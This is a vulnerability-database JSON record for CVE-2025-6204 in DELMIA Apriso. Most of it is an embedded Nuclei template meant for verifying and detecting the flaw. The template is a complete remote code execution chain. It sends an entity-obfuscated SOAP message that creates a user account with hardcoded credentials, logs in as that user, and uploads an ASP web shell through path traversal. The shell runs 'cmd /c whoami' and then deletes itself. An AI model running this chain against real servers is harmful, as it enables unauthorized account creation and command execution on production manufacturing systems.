{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-6204/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-6204/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-6204/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-6204/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-6204/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-6204"},"sightings":{"href":"/api/v1/sightings/cve-2025-6204"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.77957,"kev":true,"percentile":0.99551},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-6204.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-6204\n\ninfo:\n  name: DELMIA Apriso - Command Injection\n  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch\n  severity: critical\n  description: |\n    An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.\n  remediation: |\n    Apply security patches from DELMIA for Release 2020 through Release 2025 to implement proper file upload validation and path canonicalization.\n  impact: |\n    Authenticated attackers can upload executable files through path traversal to achieve remote code execution on DELMIA Apriso servers.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-6204\n    - https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6204\n    - https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso\n  metadata:\n    verified: true\n    max-request: 5\n    shodan-query: title:\"DELMIA Apriso\"\n  classification:\n    cve-id: CVE-2025-6204\n    epss-score: 0.77957\n    epss-percentile: 0.99551\n    cwe-id: CWE-94\n    cvss-metrics: \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\"\n    cvss-score: 9.0\n  tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive,vuln,kev,vkev\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5)\n\nvariables:\n  filename: \"{{randbase(5)}}\"\n  username: \"LAST\"\n  password: \"9\"\n\nhttp:\n  - raw:\n      - |-\n        POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml;charset=utf-8\n        Soapaction: \"http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2\"\n\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\n        xmlns:tem=\"http://tempuri.org/\">\n            <soapenv:Header/>\n            <soapenv:Body>\n                <tem:ProcessMessageASync_v2>\n                    <tem:xmlMessage>&lt;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&#32;&#120;&#109;&#108;&#110;&#115;&#58;&#120;&#115;&#105;&#61;&quot;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#119;&#51;&#46;&#111;&#114;&#103;&#47;&#50;&#48;&#48;&#49;&#47;&#88;&#77;&#76;&#83;&#99;&#104;&#101;&#109;&#97;&#45;&#105;&#110;&#115;&#116;&#97;&#110;&#99;&#101;&quot;&#32;&#120;&#115;&#105;&#58;&#110;&#111;&#78;&#97;&#109;&#101;&#115;&#112;&#97;&#99;&#101;&#83;&#99;&#104;&#101;&#109;&#97;&#76;&#111;&#99;&#97;&#116;&#105;&#111;&#110;&#61;&quot;&#83;&#58;&#47;&#83;&#99;&#104;&#101;&#109;&#97;&#82;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#47;&#88;&#77;&#76;&#83;&#99;&#104;&#101;&#109;&#97;&#115;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&#46;&#120;&#115;&#100;&quot;&#32;&#86;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&quot;&#49;&#46;&#48;&quot;&gt;&#13;&#10;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#71;&#105;&#118;&#101;&#110;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#71;&#105;&#118;&#101;&#110;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#70;&#97;&#109;&#105;&#108;&#121;&#78;&#97;&#109;&#101;&gt;&#76;&#65;&#83;&#84;&lt;&#47;&#70;&#97;&#109;&#105;&#108;&#121;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#78;&#111;&gt;&#48;&#56;&#50;&#54;&#50;&#48;&#48;&#52;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#78;&#111;&gt;&#13;&#10;&#9;&#9;&lt;&#76;&#111;&#103;&#105;&#110;&#78;&#97;&#109;&#101;&gt;{{username}}&lt;&#47;&#76;&#111;&#103;&#105;&#110;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&gt;{{password}}&lt;&#47;&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&gt;&#13;&#10;&#9;&#9;&lt;&#72;&#105;&#114;&#101;&#68;&#97;&#116;&#101;&gt;&#50;&#48;&#48;&#48;&#45;&#48;&#54;&#45;&#48;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#72;&#105;&#114;&#101;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#83;&#112;&#111;&#107;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#49;&#48;&#51;&#51;&lt;&#47;&#83;&#112;&#111;&#107;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#87;&#114;&#105;&#116;&#116;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#49;&#48;&#51;&#51;&lt;&#47;&#87;&#114;&#105;&#116;&#116;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#86;&#97;&#108;&#105;&#100;&#68;&#97;&#116;&#101;&gt;&#50;&#48;&#48;&#48;&#45;&#48;&#54;&#45;&#48;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#86;&#97;&#108;&#105;&#100;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#76;&#111;&#103;&#105;&#110;&#69;&#120;&#112;&#105;&#114;&#97;&#116;&#105;&#111;&#110;&#68;&#97;&#116;&#101;&gt;&#57;&#57;&#57;&#57;&#45;&#49;&#50;&#45;&#51;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#76;&#111;&#103;&#105;&#110;&#69;&#120;&#112;&#105;&#114;&#97;&#116;&#105;&#111;&#110;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#84;&#121;&#112;&#101;&gt;&#48;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#84;&#121;&#112;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#70;&#97;&#99;&#105;&#108;&#105;&#116;&#121;&gt;&#67;&#49;&#80;&#49;&lt;&#47;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#70;&#97;&#99;&#105;&#108;&#105;&#116;&#121;&gt;&#13;&#10;&#9;&#9;&lt;&#84;&#114;&#97;&#99;&#107;&#76;&#97;&#98;&#111;&#114;&#70;&#108;&#97;&#103;&gt;&#116;&#114;&#117;&#101;&lt;&#47;&#84;&#114;&#97;&#99;&#107;&#76;&#97;&#98;&#111;&#114;&#70;&#108;&#97;&#103;&gt;&#13;&#10;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#95;&#73;&#110;&#115;&#101;&#114;&#116;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#84;&#121;&#112;&#101;&gt;&#49;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#84;&#121;&#112;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#70;&#85;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&#47;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#95;&#73;&#110;&#115;&#101;&#114;&#116;&gt;&#13;&#10;&#9;&#9;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&#47;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&gt;&#80;&#114;&#111;&#100;&#117;&#99;&#116;&#105;&#111;&#110;&#32;&#85;&#115;&#101;&#114;&lt;&#47;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#47;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#47;&#82;&#111;&#108;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&gt;&#13;&#10;&lt;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&gt;</tem:xmlMessage>\n                    <tem:applicationName>myExternalApplication</tem:applicationName>\n                </tem:ProcessMessageASync_v2>\n            </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - ProcessMessageASync_v2Response\n          - <ProcessMessageASync_v2Result>true</ProcessMessageASync_v2Result>\n        condition: and\n        internal: true\n\n\n  - raw:\n      - |\n        GET /Apriso/Portal/Kiosk/Login.aspx HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    extractors:\n      - type: regex\n        part: body\n        name: viewstate\n        group: 1\n        regex:\n          - '__VIEWSTATE\" value=\"(.*?)\"'\n        internal: true\n\n      - type: regex\n        part: body\n        name: eventval\n        group: 1\n        regex:\n          - '__EVENTVALIDATION\" value=\"(.*?)\"'\n        internal: true\n\n      - type: regex\n        part: body\n        name: viewgen\n        group: 1\n        regex:\n          - '__VIEWSTATEGENERATOR\" value=\"(.*?)\"'\n        internal: true\n\n  - raw:\n      - |-\n        POST /Apriso/Portal/Kiosk/Login.aspx?BackToStartPage=true HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewgen}}&__EVENTVALIDATION={{urlencode(eventval)}}&ctl04%24LoginTextBox={{username}}&ctl04%24PasswordTextbox={{password}}&ctl04%24LogInButton=Log+In&ctl04%24HiddenValue=Initial+Value&ctl04%24HiddenValue2=Initial+Value\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 302\n        internal: true\n\n# Self-deleteable ASP POC File\n  - raw:\n      - |\n        POST /Apriso/webservices/1.1/operation.svc/UploadFile?filename=375c9638-1a4e-465d-90d7-f69321315acb-xxx\\..\\..\\..\\portal\\Uploads\\{{filename}}.asp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        <%\n          Response.Write \"{{randstr}}\" & \"<br>\"\n\n          Set rs = CreateObject(\"WScript.Shell\")\n          Set cmd = rs.Exec(\"cmd /c whoami\")\n          o = cmd.StdOut.Readall()\n          Response.write(o)\n\n          Set fso = Server.CreateObject(\"Scripting.FileSystemObject\")\n          fso.DeleteFile Server.MapPath(Request.ServerVariables(\"SCRIPT_NAME\")), True\n          Set fso = Nothing\n        %>\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - Uploads\n          - ResultMessage\n          - FilePath\n          - Success\n          - \"{{filename}}.asp\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /Apriso/Portal/Uploads/{{filename}}.asp HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{randstr}}\"\n\n    extractors:\n      - type: regex\n        group: 1\n        regex:\n          - <br>(.*)\n# digest: 4a0a0047304502204364c6cac6ee1fc406f4a53e9e738bbae39e154a28e3b7a4cda8945395bf8b5c022100e37b2dc9da91bd6bf780f7cc40d86e81dc325599ce95e01806e914cce49e0a9d:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2025-6204"}